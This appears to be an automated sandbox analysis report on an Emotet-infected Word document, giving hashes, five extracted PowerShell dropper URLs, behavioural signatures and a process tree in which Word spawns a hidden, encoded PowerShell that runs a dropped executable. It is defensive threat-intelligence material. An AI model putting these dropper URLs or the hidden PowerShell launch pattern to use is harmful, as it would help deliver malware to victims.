Analysis

  • max time kernel: 28s
  • resource: win10v191014
  • submitted: 18/12/2019, 09:29

General

  • Target: bedd65fafaa2669674465e8001225734903a0f8e2cebb2abb023dca6e1820a26
  • Sample: 191218-3y5wzkd666
  • SHA256: bedd65fafaa2669674465e8001225734903a0f8e2cebb2abb023dca6e1820a26

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Source: URLs
  • exe.dropper: https://oneofakindcm.com/wp-content/q5b4qvb/
  • exe.dropper: https://bar-ola.com/wp-admin/KIdh35kENT/
  • exe.dropper: http://rinani.com/wp-includes/FFkV/
  • exe.dropper: https://stephporn.com/wp-admin/jzBARJvm/
  • exe.dropper: https://wowmotions.com/wp-admin/A8LwzwQ/

Extracted

Family

emotet

C2

rsa_pubkey.plain

Signatures

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (depth 1)
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bedd65fafaa2669674465e8001225734903a0f8e2cebb2abb023dca6e1820a26.doc" /o ""
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID: 4844
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe (depth 1)
    Powershell -w hidden -en [base64-encoded command omitted]
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID: 4064
    • C:\Users\Admin\291.exe (depth 2)
      "C:\Users\Admin\291.exe"
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID: 4628
      • C:\Users\Admin\291.exe (depth 3)
        --d037f6c8
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        PID: 4588

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/4588-12-0x0000000002060000-0x0000000002077000-memory.dmp (Filesize: 92KB)
  • memory/4588-13-0x0000000000400000-0x0000000000461000-memory.dmp (Filesize: 388KB)
  • memory/4628-10-0x0000000002250000-0x0000000002267000-memory.dmp (Filesize: 92KB)